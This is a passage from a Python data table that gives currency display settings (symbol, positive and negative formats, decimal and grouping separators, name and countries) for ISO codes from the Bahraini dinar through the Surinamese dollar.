SYMBOL: u'د.ب.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Bahraini dinar',
'countries': ['Bahrain', 'BH']
},
'BIF': {
SYMBOL: u'FBu',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Burundian franc',
'countries': ['Burundi', 'BI']
},
'BMD': {
SYMBOL: u'BD$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Bermudian dollar',
'countries': ['Bermuda', 'BM']
},
'BND': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Brunei dollar',
'countries': ['BN']
},
'BOB': {
SYMBOL: u'$b',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Boliviano',
'countries': ['BO']
},
'BOV': {
# SYMBOL: u'$',
'name': 'Bolivian Mvdol (funds code)',
'countries': ['Bolivia', 'BO']
},
'BRL': {
SYMBOL: u'R$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Brazilian real',
'countries': ['BR']
},
'BSD': {
SYMBOL: u'B$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Bahamian dollar',
'countries': ['Bahamas', 'BS']
},
'BTN': {
SYMBOL: u'Nu.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Bhutanese ngultrum',
'countries': ['Bhutan', 'BT']
},
'BWP': {
SYMBOL: u'P',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Botswana pula',
'countries': ['Botswana', 'BW']
},
'BYR': {
SYMBOL: u'р.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Belarusian ruble',
'countries': ['BY']
},
'BZD': {
SYMBOL: u'BZ$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Belize dollar',
'countries': ['BZ']
},
'CAD': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Canadian dollar',
'countries': ['CA']
},
'CDF': {
SYMBOL: u'FC',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Congolese franc',
'countries': ['Democratic Republic of Congo', 'CD']
},
'CHF': {
SYMBOL: u'SFr.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: '\'',
GROUP_DIGITS: True,
'name': 'Swiss franc',
'countries': ['CH', 'LI']
},
'CLP': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Chilean peso',
'countries': ['CL']
},
'CNY': {
SYMBOL: u'¥',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Chinese yuan',
'countries': ['CN', 'MN']
},
'COP': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Colombian peso',
'countries': ['CO']
},
'CRC': {
SYMBOL: u'₡',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Costa Rican colon',
'countries': ['CR']
},
'CSD': {
SYMBOL: u'Дин.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Serbian dinar',
'countries': ['CS']
},
'CUC': {
# SYMBOL: u'$',
'name': 'Cuban convertible peso',
'countries': ['Cuba']
},
'CUP': {
SYMBOL: u'₱',
'name': 'Cuban peso',
'countries': ['Cuba']
},
'CVE': {
# SYMBOL: u'$',
'name': 'Cape Verde escudo',
'countries': ['Cape Verde']
},
'CZK': {
SYMBOL: u'Kč',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Czech koruna',
'countries': ['CZ']
},
'DJF': {
# SYMBOL: u'$',
'name': 'Djiboutian franc',
'countries': ['Djibouti']
},
'DKK': {
SYMBOL: u'kr',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Danish krone',
'countries': ['DK', 'FO', 'GL']
},
'DOP': {
SYMBOL: u'RD$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Dominican peso',
'countries': ['DO']
},
'DZD': {
SYMBOL: u'د.ج.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Algerian dinar',
'countries': ['DZ'],
},
'EEK': {
SYMBOL: u'kr',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
        'name': 'Estonian kroon',
'countries': ['EE']
},
'EGP': {
SYMBOL: u'ج.م.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Egyptian pound',
'countries': ['Egypt', 'EG']
},
'ERN': {
# SYMBOL: u'$',
'name': 'Eritrean nakfa',
'countries': ['Eritrea']
},
'ESP': {
SYMBOL: u'₧',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Spanish peseta',
'countries': ['ES']
},
'ETB': {
SYMBOL: u'ETB',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Ethiopian birr',
'countries': ['Ethiopia', 'ET']
},
'EUR': {
SYMBOL: u'€',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Euro',
'countries': ['17 European Union countries, Andorra, Kosovo, Monaco, Montenegro, San Marino, Vatican City; see eurozone', 'ES', 'FR', 'AT', 'DE', 'LU', 'GR', 'IE', 'FI', 'BE', 'NL', 'IT', 'PT', 'SK', 'LI', 'SI', 'ST']
},
'FJD': {
SYMBOL: u'$',
'name': 'Fiji dollar',
'countries': ['Fiji', 'FJ']
},
'FKP': {
SYMBOL: u'£',
'name': 'Falkland Islands pound',
'countries': ['Falkland Islands']
},
'GBP': {
SYMBOL: u'£',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Pound sterling',
'countries': ['GB']
},
'GEL': {
SYMBOL: u'Lari',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Georgian lari',
'countries': ['GE']
},
'GHS': {
# SYMBOL: u'₵',
'name': 'Ghanaian cedi',
'countries': ['Ghana']
},
'GIP': {
SYMBOL: u'£',
'name': 'Gibraltar pound',
'countries': ['Gibraltar', 'GI']
},
'GMD': {
# SYMBOL: u'$',
'name': 'Gambian dalasi',
'countries': ['Gambia', 'GM']
},
'GNF': {
# SYMBOL: u'$',
'name': 'Guinean franc',
'countries': ['Guinea', 'GN']
},
'GTQ': {
SYMBOL: u'Q',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Guatemalan quetzal',
'countries': ['GT']
},
'GYD': {
SYMBOL: u'$',
'name': 'Guyanese dollar',
'countries': ['Guyana', 'GY']
},
'HKD': {
SYMBOL: u'HK$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Hong Kong dollar',
'countries': ['HK']
},
'HNL': {
SYMBOL: u'L.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Honduran lempira',
'countries': ['HN']
},
'HRK': {
SYMBOL: u'kn',
'name': 'Croatian kuna',
'countries': ['HR']
},
'HTG': {
# SYMBOL: u'$',
'name': 'Haitian gourde',
'countries': ['Haiti', 'HT']
},
'HUF': {
SYMBOL: u'Ft',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Hungarian forint',
        'countries': ['HU']
},
'IDR': {
SYMBOL: u'Rp',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Indonesian rupiah',
'countries': ['ID']
},
'ILS': {
SYMBOL: u'₪',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Israeli new sheqel',
'countries': ['IL']
},
'INR': {
SYMBOL: u'Rs.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Indian rupee',
'countries': ['IN']
},
'IQD': {
SYMBOL: u'د.ع.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Iraqi dinar',
'countries': ['IQ'],
},
'IRR': {
SYMBOL: u'ريال',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '/',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Iranian rial',
'countries': ['Iran', 'IR']
},
'ISK': {
SYMBOL: u'kr.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': u'Icelandic króna',
'countries': ['IS']
},
'JMD': {
SYMBOL: u'J$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Jamaican dollar',
'countries': ['JM']
},
'JOD': {
SYMBOL: u'د.ا.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Jordanian dinar',
'countries': ['JO'],
},
'JPY': {
SYMBOL: u'¥',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Japanese yen',
'countries': ['JP']
},
'KES': {
SYMBOL: u'S',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Kenyan shilling',
'countries': ['KE']
},
'KGS': {
SYMBOL: u'сом',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: '-',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Kyrgyzstani som',
'countries': ['KG']
},
'KHR': {
SYMBOL: u'៛',
POSITIVE_FORMAT: u'{value}{symbol}',
NEGATIVE_FORMAT: u'-{value}{symbol}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Cambodian riel',
'countries': ['Cambodia', 'KH']
},
'KMF': {
'name': 'Comoro franc',
# SYMBOL: u'$',
'countries': ['Comoros', 'KM']
},
'KPW': {
'name': 'North Korean won',
SYMBOL: u'₩',
'countries': ['North Korea', 'KP']
},
'KRW': {
SYMBOL: u'₩',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'South Korean won',
'countries': ['KR']
},
'KWD': {
SYMBOL: u'د.ك.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Kuwaiti dinar',
'countries': ['KW'],
},
'KYD': {
SYMBOL: u'$',
'name': 'Cayman Islands dollar',
'countries': ['Cayman Islands', 'KY']
},
'KZT': {
SYMBOL: u'Т',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '-',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Kazakhstani tenge',
'countries': ['KZ']
},
'LAK': {
SYMBOL: u'₭',
POSITIVE_FORMAT: u'{value}{symbol}',
NEGATIVE_FORMAT: u'({value}{symbol})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Lao kip',
'countries': ['LA']
},
'LBP': {
SYMBOL: u'ل.ل.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Lebanese pound',
'countries': ['LB']
},
'LKR': {
SYMBOL: u'රු.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Sri Lanka rupee',
'countries': ['LK']
},
'LRD': {
SYMBOL: u'$',
'name': 'Liberian dollar',
'countries': ['Liberia', 'LR']
},
'LSL': {
# SYMBOL: u'$',
'name': 'Lesotho loti',
'countries': ['Lesotho', 'LS']
},
'LTL': {
SYMBOL: u'Lt',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Lithuanian litas',
'countries': ['LT']
},
'LUF': {
SYMBOL: u'F',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Luxembourg franc',
'countries': ['LU']
},
'LVL': {
SYMBOL: u'Ls',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'-{symbol} {value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Latvian lats',
'countries': ['LV']
},
'LYD': {
SYMBOL: u'د.ل.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Libyan dinar',
'countries': ['LY']
},
'MAD': {
SYMBOL: u'د.م.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Moroccan dirham',
'countries': ['MA'],
},
'MDL': {
        'name': 'Moldovan leu',
# SYMBOL: u'$',
'countries': ['Moldova (except Transnistria)', 'MD']
},
'MGA': {
# SYMBOL: u'$',
'name': 'Malagasy ariary',
'countries': ['Madagascar', 'MG']
},
'MKD': {
SYMBOL: u'ден.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Macedonian denar',
'countries': ['MK']
},
'MMK': {
# SYMBOL: u'$',
'name': 'Myanma kyat',
'countries': ['Myanmar', 'MM']
},
'MNT': {
SYMBOL: u'₮',
POSITIVE_FORMAT: u'{value}{symbol}',
NEGATIVE_FORMAT: u'-{value}{symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Mongolian tugrik',
'countries': ['MN']
},
'MOP': {
SYMBOL: u'MOP',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Macanese pataca',
'countries': ['MO']
},
'MRO': {
# SYMBOL: u'$',
'name': 'Mauritanian ouguiya',
'countries': ['Mauritania', 'MR']
},
'MTL': {
SYMBOL: u'Lm',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Maltese lira',
'countries': ['MT']
},
'MUR': {
SYMBOL: u'₨',
'name': 'Mauritian rupee',
'countries': ['Mauritius', 'MU']
},
'MVR': {
SYMBOL: u'ރ.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'{value} {symbol}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Maldivian rufiyaa',
'countries': ['MV']
},
'MWK': {
# SYMBOL: u'$',
'name': 'Malawian kwacha',
'countries': ['Malawi', 'MW']
},
'MXN': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Mexican peso',
'countries': ['MX']
},
# 'MXV': {
# 'name': 'Mexican Unidad de Inversion (UDI) (funds code)',
# SYMBOL: u'$',
# 'countries': ['Mexico']
# },
'MYR': {
SYMBOL: u'RM',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Malaysian ringgit',
'countries': ['MY']
},
'MZN': {
SYMBOL: u'MT',
'name': 'Mozambican metical',
'countries': ['Mozambique', 'MZ']
},
'NAD': {
SYMBOL: u'$',
'name': 'Namibian dollar',
'countries': ['Namibia', 'NA']
},
'NGN': {
SYMBOL: u'₦',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Nigerian naira',
'countries': ['NG']
},
'NIO': {
SYMBOL: u'C$',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Cordoba oro',
'countries': ['NI']
},
'NOK': {
SYMBOL: u'kr',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Norwegian krone',
'countries': ['NO']
},
'NPR': {
SYMBOL: u'रु',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Nepalese rupee',
'countries': ['NP']
},
'NZD': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'-{symbol}{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'New Zealand dollar',
'countries': ['NZ']
},
'OMR': {
SYMBOL: u'ر.ع.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Omani rial',
'countries': ['Oman', 'OM']
},
'PAB': {
SYMBOL: u'B/.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Panamanian balboa',
'countries': ['PA']
},
'PEN': {
SYMBOL: u'S/.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol} -{value}',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Peruvian nuevo sol',
'countries': ['PE']
},
'PGK': {
# SYMBOL: u'$',
'name': 'Papua New Guinean kina',
'countries': ['Papua New Guinea', 'PG']
},
'PHP': {
SYMBOL: u'Php',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Philippine peso',
'countries': ['PH']
},
'PKR': {
SYMBOL: u'Rs',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Pakistani rupee',
'countries': ['PK']
},
'PLN': {
SYMBOL: u'zł',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': u'Polish złoty',
'countries': ['PL']
},
'PYG': {
SYMBOL: u'Gs',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'({symbol} {value})',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': u'Paraguayan guaraní',
'countries': ['Paraguay', 'PY']
},
'QAR': {
SYMBOL: u'ر.ق.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Qatari rial',
'countries': ['QA']
},
'RON': {
SYMBOL: u'lei',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
        'name': 'Romanian new leu',
'countries': ['RO']
},
'RSD': {
SYMBOL: u'Дин.',
'name': 'Serbian dinar',
'countries': ['Serbia', 'CS']
},
'RUB': {
        SYMBOL: u'р.',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Russian rouble',
'countries': ['RU']
},
'RWF': {
SYMBOL: u'RWF',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}-{value}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: ' ',
GROUP_DIGITS: True,
'name': 'Rwandan franc',
'countries': ['RW']
},
'SAR': {
SYMBOL: u'ر.س.',
POSITIVE_FORMAT: u'{symbol} {value}',
NEGATIVE_FORMAT: u'{symbol}{value}-',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Saudi riyal',
'countries': ['SA']
},
'SBD': {
SYMBOL: u'$',
'name': 'Solomon Islands dollar',
'countries': ['Solomon Islands', 'SB']
},
'SCR': {
SYMBOL: u'₨',
'name': 'Seychelles rupee',
'countries': ['Seychelles', 'SC']
},
'SDG': {
# SYMBOL: u'$',
'name': 'Sudanese pound',
'countries': ['Sudan', 'SD']
},
'SEK': {
SYMBOL: u'kr',
POSITIVE_FORMAT: u'{value} {symbol}',
NEGATIVE_FORMAT: u'-{value} {symbol}',
DECIMAL_SYMBOL: ',',
DIGIT_GROUP_SYMBOL: '.',
GROUP_DIGITS: True,
'name': 'Swedish krona/kronor',
'countries': ['SE']
},
'SGD': {
SYMBOL: u'$',
POSITIVE_FORMAT: u'{symbol}{value}',
NEGATIVE_FORMAT: u'({symbol}{value})',
DECIMAL_SYMBOL: '.',
DIGIT_GROUP_SYMBOL: ',',
GROUP_DIGITS: True,
'name': 'Singapore dollar',
'countries': ['SG']
},
'SHP': {
SYMBOL: u'£',
'name': 'Saint Helena pound',
'countries': ['Saint Helena', 'SH']
},
'SLL': {
# SYMBOL: u'$',
'name': 'Sierra Leonean leone',
'countries': ['Sierra Leone', 'SL']
},
'SOS': {
SYMBOL: u'S',
'name': 'Somali shilling',
'countries': ['Somalia (except Somaliland)', 'SO']
},
'SRD': {
SYMBOL: u'$',
'name': 'Surinamese dollar',
